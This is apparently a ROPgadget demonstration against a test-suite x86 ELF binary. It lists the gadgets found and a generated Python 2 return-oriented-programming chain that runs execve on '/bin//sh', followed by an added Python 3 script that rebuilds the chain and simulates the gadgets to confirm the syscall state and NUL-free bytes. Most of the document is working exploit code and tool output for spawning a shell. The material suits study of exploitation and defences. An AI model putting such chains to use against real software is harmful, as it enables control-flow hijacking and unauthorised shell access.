$ ./ROPgadget.py --ropchain --binary ./test-suite-binaries/elf-Linux-x86 

[...]

Unique gadgets found: 6472

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

    [+] Gadget found: 0x806f702 mov dword ptr [edx], ecx ; ret
    [+] Gadget found: 0x8056c2c pop edx ; ret
    [+] Gadget found: 0x8056c56 pop ecx ; pop ebx ; ret
    [-] Can't find the 'xor ecx, ecx' gadget. Try with another 'mov [reg], reg'

    [+] Gadget found: 0x808fe0d mov dword ptr [edx], eax ; ret
    [+] Gadget found: 0x8056c2c pop edx ; ret
    [+] Gadget found: 0x80c5126 pop eax ; ret
    [+] Gadget found: 0x80bb07f xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

    [+] Gadget found: 0x80bb07f xor eax, eax ; ret
    [+] Gadget found: 0x807030c inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

    [+] Gadget found: 0x80481dd pop ebx ; ret
    [+] Gadget found: 0x8056c56 pop ecx ; pop ebx ; ret
    [+] Gadget found: 0x8056c2c pop edx ; ret

- Step 4 -- Syscall gadget

    [+] Gadget found: 0x80573c0 int 0x80

- Step 5 -- Build the ROP chain

    #!/usr/bin/env python2
    # execve generated by ROPgadget v5.2

    from struct import pack

    # Padding goes here
    p = ''

    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4060) # @ .data
    p += pack('<I', 0x080c5126) # pop eax ; ret
    p += '/bin'
    p += pack('<I', 0x0808fe0d) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4064) # @ .data + 4
    p += pack('<I', 0x080c5126) # pop eax ; ret
    p += '//sh'
    p += pack('<I', 0x0808fe0d) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4068) # @ .data + 8
    p += pack('<I', 0x080bb07f) # xor eax, eax ; ret
    p += pack('<I', 0x0808fe0d) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x080481dd) # pop ebx ; ret
    p += pack('<I', 0x080f4060) # @ .data
    p += pack('<I', 0x08056c56) # pop ecx ; pop ebx ; ret
    p += pack('<I', 0x080f4068) # @ .data + 8
    p += pack('<I', 0x080f4060) # padding without overwrite ebx
    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4068) # @ .data + 8
    p += pack('<I', 0x080bb07f) # xor eax, eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x080573c0) # int 0x80
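The generated script is Python 2 (it mixes `'/bin'` and `pack()` in one `str`); under Python 3 the same chain has to be built as `bytes`. The following is an added example, not part of ROPgadget's output, that rebuilds the step 5 chain in Python 3 from the gadget addresses listed in steps 1 to 4 and then runs it through a small interpreter of those eight gadgets to confirm what the chain leaves in the registers and in `.data` when `int 0x80` is reached: `eax` = 11 (`__NR_execve` on i386), `ebx` pointing at `"/bin//sh\0"`, `ecx` and `edx` pointing at a NULL dword. It also checks that no byte of the chain is NUL, which is why the chain spells the path as `//sh` and builds 11 with `xor eax, eax` plus eleven `inc eax` instead of popping the constant. The `.data` address `0x080f4060` is the one ROPgadget chose above; the function names, the `GADGETS` table and the interpreter are assumptions of this example.

```python
#!/usr/bin/env python3
# Added example (not ROPgadget's own code): rebuild the execve chain in
# Python 3 and check it with a tiny interpreter of the listed gadgets.
from struct import pack, unpack

DATA = 0x080f4060  # "@ .data" as printed in the generated chain above

# Gadgets printed in steps 1-4 above (address -> instruction text).
GADGETS = {
    0x08056c2c: "pop edx ; ret",
    0x080c5126: "pop eax ; ret",
    0x0808fe0d: "mov dword ptr [edx], eax ; ret",
    0x080bb07f: "xor eax, eax ; ret",
    0x080481dd: "pop ebx ; ret",
    0x08056c56: "pop ecx ; pop ebx ; ret",
    0x0807030c: "inc eax ; ret",
    0x080573c0: "int 0x80",
}
ADDR = {text: addr for addr, text in GADGETS.items()}


def p32(v):
    return pack("<I", v & 0xffffffff)


def build_execve_chain(data=DATA):
    """Same layout as step 5 above, built as bytes instead of a Python 2 str."""
    c = b""
    # Step 1: write "/bin//sh" then a NUL dword into .data with the
    # write-what-where gadget; "pop eax" loads the 4 path bytes as the dword.
    for off, word in ((0, b"/bin"), (4, b"//sh")):
        c += p32(ADDR["pop edx ; ret"]) + p32(data + off)
        c += p32(ADDR["pop eax ; ret"]) + word
        c += p32(ADDR["mov dword ptr [edx], eax ; ret"])
    c += p32(ADDR["pop edx ; ret"]) + p32(data + 8)
    c += p32(ADDR["xor eax, eax ; ret"])  # eax = 0 without a NUL byte in the chain
    c += p32(ADDR["mov dword ptr [edx], eax ; ret"])
    # Step 3: ebx = path, ecx = argv (pointer to NULL), edx = envp (pointer to NULL).
    c += p32(ADDR["pop ebx ; ret"]) + p32(data)
    # The second pop of this gadget would clobber ebx, so feed it the path again.
    c += p32(ADDR["pop ecx ; pop ebx ; ret"]) + p32(data + 8) + p32(data)
    c += p32(ADDR["pop edx ; ret"]) + p32(data + 8)
    # Step 2: eax = 11 (__NR_execve on i386) via xor + 11 increments.
    c += p32(ADDR["xor eax, eax ; ret"]) + p32(ADDR["inc eax ; ret"]) * 11
    # Step 4: the syscall gadget.
    c += p32(ADDR["int 0x80"])
    return c


def simulate(chain):
    """Run the chain over a dword stack with a 32-bit register file and a
    byte-addressed memory dict; return (regs, mem) when int 0x80 is reached.
    Each 'ret' simply pops the next stack slot as the next gadget address."""
    regs = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    mem = {}
    words = [unpack("<I", chain[i:i + 4])[0] for i in range(0, len(chain), 4)]
    sp = 0
    while sp < len(words):
        target = words[sp]
        sp += 1
        if target not in GADGETS:
            raise RuntimeError("ret into non-gadget address 0x%08x" % target)
        ins = GADGETS[target]
        if ins == "int 0x80":
            return regs, mem
        for op in ins.split(" ; "):
            if op.startswith("pop "):
                regs[op[4:]] = words[sp]
                sp += 1
            elif op == "xor eax, eax":
                regs["eax"] = 0
            elif op == "inc eax":
                regs["eax"] = (regs["eax"] + 1) & 0xffffffff
            elif op == "mov dword ptr [edx], eax":
                for i, b in enumerate(p32(regs["eax"])):
                    mem[regs["edx"] + i] = b
    raise RuntimeError("chain ran off the stack without reaching int 0x80")


def cstring(mem, addr):
    out = bytearray()
    while mem.get(addr, 0):
        out.append(mem[addr])
        addr += 1
    return bytes(out)


def read32(mem, addr):
    return unpack("<I", bytes(mem.get(addr + i, 0) for i in range(4)))[0]


def check_execve(chain):
    """Summarise the syscall state the chain sets up, as a dict."""
    regs, mem = simulate(chain)
    return {
        "nr": regs["eax"],
        "path": cstring(mem, regs["ebx"]),
        "argv0": read32(mem, regs["ecx"]),
        "envp0": read32(mem, regs["edx"]),
        "nul_free": b"\x00" not in chain,
    }


if __name__ == "__main__":
    chain = build_execve_chain()
    print(len(chain), "bytes:", check_execve(chain))
```

The interpreter only knows the eight gadgets ROPgadget picked, so any stack slot that ends up being "returned into" without being consumed by a `pop` raises an error; that is exactly the mistake to look for when hand-editing a generated chain (for example, dropping the second value after `pop ecx ; pop ebx ; ret`).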